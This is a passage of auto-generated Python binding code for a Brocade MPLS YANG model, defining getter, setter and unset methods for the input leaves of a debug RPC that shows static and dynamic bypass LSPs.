self.__bypass_lsp_static_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_name(self):
"""
Getter method for bypass_lsp_static_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name (string)
YANG Description: Show one static bypass-lsp detailed info by name
"""
return self.__bypass_lsp_static_name
def _set_bypass_lsp_static_name(self, v, load=False):
"""
Setter method for bypass_lsp_static_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_name is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_name() directly.
YANG Description: Show one static bypass-lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_static_name = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_name(self):
self.__bypass_lsp_static_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_static_name_extensive(self):
"""
Getter method for bypass_lsp_static_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_extensive (boolean)
YANG Description: Show one static bypass-lsp extensive info by name
"""
return self.__bypass_lsp_static_name_extensive
def _set_bypass_lsp_static_name_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_static_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_name_extensive is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_name_extensive() directly.
YANG Description: Show one static bypass-lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_name_extensive(self):
self.__bypass_lsp_static_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_name_debug(self):
"""
Getter method for bypass_lsp_static_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_debug (boolean)
YANG Description: Show one static bypass-lsp extensive debug info by name
"""
return self.__bypass_lsp_static_name_debug
def _set_bypass_lsp_static_name_debug(self, v, load=False):
"""
Setter method for bypass_lsp_static_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_name_debug is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_name_debug() directly.
YANG Description: Show one static bypass-lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_name_debug(self):
self.__bypass_lsp_static_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
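# The bypass_lsp_dynamic_* leaves that follow mirror the bypass_lsp_static_*
# leaves one-for-one (brief/wide/detail/extensive/debug plus the by-name
# variants), differing only in selecting dynamically created bypass LSPs.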
def _get_bypass_lsp_dynamic(self):
"""
Getter method for bypass_lsp_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic (string)
YANG Description: Show all dynamic bypass-lsps in brief
"""
return self.__bypass_lsp_dynamic
def _set_bypass_lsp_dynamic(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic() directly.
YANG Description: Show all dynamic bypass-lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_dynamic = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic(self):
self.__bypass_lsp_dynamic = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_dynamic_wide(self):
"""
Getter method for bypass_lsp_dynamic_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_wide (boolean)
YANG Description: Show all dynamic bypass-lsps in brief and wide
"""
return self.__bypass_lsp_dynamic_wide
def _set_bypass_lsp_dynamic_wide(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_wide is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_wide() directly.
YANG Description: Show all dynamic bypass-lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_wide(self):
self.__bypass_lsp_dynamic_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_detail(self):
"""
Getter method for bypass_lsp_dynamic_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_detail (boolean)
YANG Description: Show all dynamic bypass-lsps in detail
"""
return self.__bypass_lsp_dynamic_detail
def _set_bypass_lsp_dynamic_detail(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_detail is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_detail() directly.
YANG Description: Show all dynamic bypass-lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_detail(self):
self.__bypass_lsp_dynamic_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_extensive(self):
"""
Getter method for bypass_lsp_dynamic_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_extensive (boolean)
YANG Description: Show all dynamic bypass-lsps in extensive
"""
return self.__bypass_lsp_dynamic_extensive
def _set_bypass_lsp_dynamic_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_extensive is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_extensive() directly.
YANG Description: Show all dynamic bypass-lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_extensive(self):
self.__bypass_lsp_dynamic_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_debug(self):
"""
Getter method for bypass_lsp_dynamic_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_debug (boolean)
YANG Description: Show all dynamic bypass-lsps in extensive debug
"""
return self.__bypass_lsp_dynamic_debug
def _set_bypass_lsp_dynamic_debug(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_debug is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_debug() directly.
YANG Description: Show all dynamic bypass-lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_debug(self):
self.__bypass_lsp_dynamic_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_name(self):
"""
Getter method for bypass_lsp_dynamic_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name (string)
YANG Description: Show one dynamic bypass-lsp detailed info by name
"""
return self.__bypass_lsp_dynamic_name
def _set_bypass_lsp_dynamic_name(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_name is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_name() directly.
YANG Description: Show one dynamic bypass-lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_dynamic_name = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_name(self):
self.__bypass_lsp_dynamic_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_dynamic_name_extensive(self):
"""
Getter method for bypass_lsp_dynamic_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_extensive (boolean)
YANG Description: Show one dynamic bypass-lsp extensive info by name
"""
return self.__bypass_lsp_dynamic_name_extensive
def _set_bypass_lsp_dynamic_name_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_name_extensive is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_name_extensive() directly.
YANG Description: Show one dynamic bypass-lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_name_extensive(self):
self.__bypass_lsp_dynamic_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_name_debug(self):
"""
Getter method for bypass_lsp_dynamic_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_debug (boolean)
YANG Description: Show one dynamic bypass-lsp extensive debug info by name
"""
return self.__bypass_lsp_dynamic_name_debug
def _set_bypass_lsp_dynamic_name_debug(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_name_debug is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_dynamic_name_debug() directly.
YANG Description: Show one dynamic bypass-lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_name_debug(self):
self.__bypass_lsp_dynamic_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
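# The remaining lsp_input_* leaves carry the generic arguments of the show lsp
# command (per their YANG descriptions): the LSP name, the bypass/dynamic
# selectors, the output verbosity flags (brief/wide/detail/extensive/debug),
# and the one/all/more selection flags. They follow the same generated
# getter/setter/unset pattern as the leaves above.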
def _get_lsp_input_lsp_name(self):
"""
Getter method for lsp_input_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_lsp_name (string)
YANG Description: Lsp name for show lsp command
"""
return self.__lsp_input_lsp_name
def _set_lsp_input_lsp_name(self, v, load=False):
"""
Setter method for lsp_input_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_lsp_name is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_lsp_name() directly.
YANG Description: Lsp name for show lsp command
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_input_lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_lsp_name(self):
self.__lsp_input_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_input_bypass(self):
"""
Getter method for lsp_input_bypass, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_bypass (boolean)
YANG Description: Lsp type is bypass show lsp command
"""
return self.__lsp_input_bypass
def _set_lsp_input_bypass(self, v, load=False):
"""
Setter method for lsp_input_bypass, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_bypass (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_bypass is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_bypass() directly.
YANG Description: Lsp type is bypass show lsp command
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_bypass must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_bypass = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_bypass(self):
self.__lsp_input_bypass = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_dynamic(self):
"""
Getter method for lsp_input_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_dynamic (boolean)
YANG Description: Lsp type is dynamically created show lsp command
"""
return self.__lsp_input_dynamic
def _set_lsp_input_dynamic(self, v, load=False):
"""
Setter method for lsp_input_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_dynamic (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_dynamic is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_dynamic() directly.
YANG Description: Lsp type is dynamically created show lsp command
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_dynamic must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_dynamic = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_dynamic(self):
